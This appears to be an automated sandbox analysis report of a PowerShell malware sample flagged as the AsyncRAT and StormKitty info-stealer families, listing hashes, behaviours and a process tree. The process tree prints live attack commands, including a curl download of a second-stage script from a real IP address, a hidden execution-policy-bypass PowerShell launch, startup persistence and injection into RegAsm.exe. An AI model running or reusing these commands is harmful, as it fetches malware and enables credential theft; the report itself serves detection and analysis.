Analysis
-
max time kernel
93s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
01-01-2025 07:48
Static task
static1
Behavioral task
behavioral1
Sample
trwsfg.ps1
Resource
win7-20241023-en
General
-
Target
trwsfg.ps1
-
Size
1KB
-
MD5
22bae550672a11587c37ebb8dabeefef
-
SHA1
5c7951317700fd35bbfd39499473889c752f9164
-
SHA256
569775b523c853aa351d5832df2fdbb68fdaa8c05f9cc67289921f00a66c0157
-
SHA512
03f9028156f1ba8f4ee62537ddba10c7f7d5ab0cee8cac17c1ae43c0c57922ed8a70d03b780142708afcae9b4eb46bb9b275e8b746061620681a57a27674e92a
Malware Config
Signatures
-
Asyncrat family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/4976-50-0x0000000000400000-0x0000000000704000-memory.dmp family_stormkitty -
Stormkitty family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 4576 powershell.exe 14 1644 powershell.exe -
pid Process 4576 powershell.exe 1644 powershell.exe -
Downloads MZ/PE file
-
Drops startup file 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1644 set thread context of 4976 1644 powershell.exe 91 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 4576 powershell.exe 4576 powershell.exe 4576 powershell.exe 4576 powershell.exe 1644 powershell.exe 1644 powershell.exe 1644 powershell.exe 1644 powershell.exe 4976 RegAsm.exe 4976 RegAsm.exe 4976 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4576 powershell.exe Token: SeDebugPrivilege 1644 powershell.exe Token: SeDebugPrivilege 4976 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4976 RegAsm.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 4576 wrote to memory of 3036 4576 powershell.exe 84 PID 4576 wrote to memory of 3036 4576 powershell.exe 84 PID 3036 wrote to memory of 1484 3036 cmd.exe 85 PID 3036 wrote to memory of 1484 3036 cmd.exe 85 PID 3036 wrote to memory of 1644 3036 cmd.exe 86 PID 3036 wrote to memory of 1644 3036 cmd.exe 86 PID 1484 wrote to memory of 3584 1484 cmd.exe 87 PID 1484 wrote to memory of 3584 1484 cmd.exe 87 PID 1644 wrote to memory of 2480 1644 powershell.exe 88 PID 1644 wrote to memory of 2480 1644 powershell.exe 88 PID 2480 wrote to memory of 1652 2480 csc.exe 89 PID 2480 wrote to memory of 1652 2480 csc.exe 89 PID 1644 wrote to memory of 2304 1644 powershell.exe 90 PID 1644 wrote to memory of 2304 1644 powershell.exe 90 PID 1644 wrote to memory of 2304 1644 powershell.exe 90 PID 1644 wrote to memory of 4976 1644 powershell.exe 91 PID 1644 wrote to memory of 4976 1644 powershell.exe 91 PID 1644 wrote to memory of 4976 1644 powershell.exe 91 PID 1644 wrote to memory of 4976 1644 powershell.exe 91 PID 1644 wrote to memory of 4976 1644 powershell.exe 91 PID 1644 wrote to memory of 4976 1644 powershell.exe 91 PID 1644 wrote to memory of 4976 1644 powershell.exe 91 PID 1644 wrote to memory of 4976 1644 powershell.exe 91
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trwsfg.ps11⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Modules.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\system32\cmd.execmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps13⤵
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\system32\curl.execurl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps14⤵PID:3584
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4hlesdte\4hlesdte.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES72A0.tmp" "c:\Users\Admin\AppData\Local\Temp\4hlesdte\CSC6E29BBC36604C72AA6074A4297E12BC.TMP"5⤵PID:1652
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:2304
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4976
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
9KB
MD5fb926004d3fd333d6d8f45b65ee186d0
SHA10a33dde1a34fa70acb9c1c15c9282297211d0fb2
SHA256b8ed12db87e34f59e836f09502f44dc91dfadd84cea2198e89007ce4638fc9ef
SHA512a0f72a6157a997489ed5df170bd75d413d78f382c08a00de2b0c60950f9dfa1ff07e0bf499e1f36e0e67d62dc32b018cdfd459c7d9e1c4013ce38098249ec3f9
-
Filesize
1KB
MD5107bc83f7667d6ed52a2880aacaf92bd
SHA1a8e03da9cbafa9ae29a0f9a80a5a98917805fb43
SHA256563ddfe252e132ad409d816ff18bd6ba24e299b1ae14f3b942493234b88ec6fb
SHA512a885b72bd1728410806623d35d164536e5b15b765e19a61a640895713aa9fce695cf3f7eda8fb8d916ebd2ba86274b3a667730841f1088a9bbc46aff6959924a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5bb445d197063475c8d78de4f0825753c
SHA1158a8e3b278affe7c1185aad67683e4253cf53dd
SHA2567066e4a496d83ee1b677ade06c868a432bb4a0dd364b19ee184147a527b11c10
SHA512173cd8a56e2fa6e8db33bc13870f8751473251aa80be2235321e62b0f84961e9fd00a236aec63342d73f262dbc7c2a920951a1a8f41707ca6640e673f21c4307
-
Filesize
10KB
MD5b5c3a2d03ff4c721192716f326c77dea
SHA16b754fd988ca58865674b711aba76d3c6b2c5693
SHA256ab42fe5fd08cb87663e130f99f96124fdd37d825d081b9712b0bad8b6f270fac
SHA512d32e5a98c12b6b85d1913555ea54f837cd0fc647ca945aef9d75ffade06506be1f4a2348827f11c4eeae0796e4156c8f352e3c0f9a6e2cdc93cb501bcdf2c248
-
Filesize
204B
MD5416fc7dfafb26e12f64f8a473d49246d
SHA11cefa5cf43628c3bd3392a0c6910edb1563f9fcf
SHA25643e2507c74bd6ed1beeda91e5c0ea710389c092d7785e0e5a774c245cc63cabe
SHA512413b6af8267fb02e17d65e56b47c75053bdc4c2456d27b9a71107a2eca8cfe1da79b00a5be682d2c39272b3506d4df4320f375017a5e9675de6453b89818f9a6
-
Filesize
652B
MD5d2aecb074398be8a9fac2853bd6eaa69
SHA165033c4e7d1a71f0966c14f09b91e1c4c8938a7b
SHA2562695b29deb21110d0905553bab3dd9982ccb947305c29c0d84e71b10792bbd78
SHA5128b1c0c0c84dbacbe6e2f2d770bfb485209b3d5d07e72cc95117d01d24f2c124437d8aefdb190dd6fd79e3a9b41930bd23858860887f2e209b0a8ef18a2dc007e